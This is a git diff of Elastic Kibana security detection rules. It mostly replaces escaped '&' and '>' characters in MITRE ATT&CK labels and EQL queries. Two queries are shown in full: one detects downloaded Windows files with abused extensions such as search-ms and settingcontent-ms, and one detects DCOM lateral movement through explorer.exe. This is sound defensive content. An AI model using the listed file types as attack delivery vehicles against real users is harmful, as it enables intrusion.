+++ b/packages/security_detection_engine/kibana/security_rule/8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45_108.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 73,
 "rule_id": "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_103.json b/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_103.json
index cda216987f9..9f086fb5751 100644
--- a/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_103.json
@@ -96,7 +96,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_104.json b/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_104.json
index de51c103ceb..907e685d9b1 100644
--- a/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_104.json
@@ -95,7 +95,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_105.json b/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_105.json
index bb08b878b52..0db4260bf92 100644
--- a/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/8c81e506-6e82-4884-9b9a-75d3d252f967_105.json
@@ -96,7 +96,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_4.json b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_4.json
index 0731824854e..bf7c1fccb05 100644
--- a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_4.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_5.json b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_5.json
index 3beba52926f..1fcf340093d 100644
--- a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_5.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_6.json b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_6.json
index 1976c7eefc4..4408d9c995c 100644
--- a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_6.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_7.json b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_7.json
index bac5d22abb2..4ab719ef2cc 100644
--- a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_7.json
+++ b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_7.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_8.json b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_8.json
index bf064d1f117..5904e6bee99 100644
--- a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_8.json
+++ b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_8.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_9.json b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_9.json
index b24790f3733..6036ce6ac5f 100644
--- a/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_9.json
+++ b/packages/security_detection_engine/kibana/security_rule/8cb84371-d053-4f4f-bce0-c74990e28f28_9.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/8d366588-cbd6-43ba-95b4-0971c3f906e5_1.json b/packages/security_detection_engine/kibana/security_rule/8d366588-cbd6-43ba-95b4-0971c3f906e5_1.json
index f7fb64945db..c86522bf1f2 100644
--- a/packages/security_detection_engine/kibana/security_rule/8d366588-cbd6-43ba-95b4-0971c3f906e5_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/8d366588-cbd6-43ba-95b4-0971c3f906e5_1.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "File with Suspicious Extension Downloaded",
- "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.extension : (\n \"appinstaller\", \"application\", \"appx\", \"appxbundle\", \"cpl\", \"diagcab\", \"diagpkg\", \"diagcfg\", \"manifest\",\n \"msix\", \"pif\", \"search-ms\", \"searchConnector-ms\", \"settingcontent-ms\", \"symlink\", \"theme\", \"themepack\" \n ) and file.Ext.windows.zone_identifier \u003e 1 and\n not\n (\n file.extension : \"msix\" and file.path : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\Microsoft.Winget.Source*\"\n )\n",
+ "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.extension : (\n \"appinstaller\", \"application\", \"appx\", \"appxbundle\", \"cpl\", \"diagcab\", \"diagpkg\", \"diagcfg\", \"manifest\",\n \"msix\", \"pif\", \"search-ms\", \"searchConnector-ms\", \"settingcontent-ms\", \"symlink\", \"theme\", \"themepack\" \n ) and file.Ext.windows.zone_identifier > 1 and\n not\n (\n file.extension : \"msix\" and file.path : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\Microsoft.Winget.Source*\"\n )\n",
 "references": [
 "https://x.com/Laughing_Mantis/status/1518766501385318406",
 "https://wikileaks.org/ciav7p1/cms/page_13763375.html"
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -79,7 +79,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/8d3d0794-c776-476b-8674-ee2e685f6470_1.json b/packages/security_detection_engine/kibana/security_rule/8d3d0794-c776-476b-8674-ee2e685f6470_1.json
index 33785e91aba..0f7f61b6739 100644
--- a/packages/security_detection_engine/kibana/security_rule/8d3d0794-c776-476b-8674-ee2e685f6470_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/8d3d0794-c776-476b-8674-ee2e685f6470_1.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/8d3d0794-c776-476b-8674-ee2e685f6470_2.json b/packages/security_detection_engine/kibana/security_rule/8d3d0794-c776-476b-8674-ee2e685f6470_2.json
index 6bb4e586ee5..5413e6fec8a 100644
--- a/packages/security_detection_engine/kibana/security_rule/8d3d0794-c776-476b-8674-ee2e685f6470_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/8d3d0794-c776-476b-8674-ee2e685f6470_2.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_103.json b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_103.json
index 667fe199fbf..5438baba0bd 100644
--- a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_103.json
@@ -48,7 +48,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -63,7 +63,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_104.json b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_104.json
index 452af282846..355097ee4f1 100644
--- a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_104.json
@@ -48,7 +48,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -63,7 +63,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_105.json b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_105.json
index 72dad2b7f9c..ef3259396b1 100644
--- a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_105.json
@@ -49,7 +49,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -64,7 +64,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_106.json b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_106.json
index 411185ec62e..4cb64f6ceb4 100644
--- a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_106.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -65,7 +65,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_107.json b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_107.json
index a4d3d3e626b..ec9bfe1ebc0 100644
--- a/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_107.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -65,7 +65,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_101.json b/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_101.json
index 362cc692a66..9bee654282e 100644
--- a/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_101.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_102.json b/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_102.json
index 24d78ae2b32..6a024ef3bca 100644
--- a/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_102.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/8e39f54e-910b-4adb-a87e-494fbba5fb65_1.json b/packages/security_detection_engine/kibana/security_rule/8e39f54e-910b-4adb-a87e-494fbba5fb65_1.json
index f41bcb7d209..0215051a03b 100644
--- a/packages/security_detection_engine/kibana/security_rule/8e39f54e-910b-4adb-a87e-494fbba5fb65_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/8e39f54e-910b-4adb-a87e-494fbba5fb65_1.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/8eec4df1-4b4b-4502-b6c3-c788714604c9_1.json b/packages/security_detection_engine/kibana/security_rule/8eec4df1-4b4b-4502-b6c3-c788714604c9_1.json
index d3555eb3a48..9a38e042c2b 100644
--- a/packages/security_detection_engine/kibana/security_rule/8eec4df1-4b4b-4502-b6c3-c788714604c9_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/8eec4df1-4b4b-4502-b6c3-c788714604c9_1.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
@@ -70,7 +70,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_102.json b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_102.json
index aab0eeb6386..1c9792c5e05 100644
--- a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_102.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_103.json b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_103.json
index 03543c12cc7..1ae876f5760 100644
--- a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_103.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_104.json b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_104.json
index 305f3007a82..04c22ac3f8c 100644
--- a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_104.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_105.json b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_105.json
index 198dcb83e54..c8bdad44f5a 100644
--- a/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/8f3e91c7-d791-4704-80a1-42c160d7aa27_105.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -89,7 +89,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_103.json b/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_103.json
index f6c29a14a60..e0d606f6c3e 100644
--- a/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_103.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows",
- "query": "sequence by host.id with maxspan=5s\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e 49151 and destination.port \u003e 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"explorer.exe\"\n ] by process.parent.entity_id\n",
+ "query": "sequence by host.id with maxspan=5s\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"explorer.exe\"\n ] by process.parent.entity_id\n",
 "references": [
 "https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/"
 ],
@@ -101,7 +101,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_104.json b/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_104.json
index 6a658e3bedd..3473b8eccfa 100644
--- a/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_104.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows",
- "query": "sequence by host.id with maxspan=5s\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e 49151 and destination.port \u003e 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"explorer.exe\"\n ] by process.parent.entity_id\n",
+ "query": "sequence by host.id with maxspan=5s\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"explorer.exe\"\n ] by process.parent.entity_id\n",
 "references": [
 "https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/"
 ],
@@ -100,7 +100,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_105.json b/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_105.json
index 64600f338bd..6346d221661 100644
--- a/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/8f919d4b-a5af-47ca-a594-6be59cd924a4_105.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows",
- "query": "sequence by host.id with maxspan=5s\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e 49151 and destination.port \u003e 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"explorer.exe\"\n ] by process.parent.entity_id\n",
+ "query": "sequence by host.id with maxspan=5s\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"explorer.exe\"\n ] by process.parent.entity_id\n",
 "references": [
 "https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/"
 ],
@@ -101,7 +101,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/8fb75dda-c47a-4e34-8ecd-34facf7aad13_103.json b/packages/security_detection_engine/kibana/security_rule/8fb75dda-c47a-4e34-8ecd-34facf7aad13_103.json
index e7112e934b6..4edcb173181 100644
--- a/packages/security_detection_engine/kibana/security_rule/8fb75dda-c47a-4e34-8ecd-34facf7aad13_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/8fb75dda-c47a-4e34-8ecd-34facf7aad13_103.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/8fb75dda-c47a-4e34-8ecd-34facf7aad13_104.json b/packages/security_detection_engine/kibana/security_rule/8fb75dda-c47a-4e34-8ecd-34facf7aad13_104.json
index fbe04cb6073..bfd3e5b8b3e 100644
--- a/packages/security_detection_engine/kibana/security_rule/8fb75dda-c47a-4e34-8ecd-34facf7aad13_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/8fb75dda-c47a-4e34-8ecd-34facf7aad13_104.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_103.json b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_103.json
index a0dfe35b7e1..349809fa28b 100644
--- a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_103.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
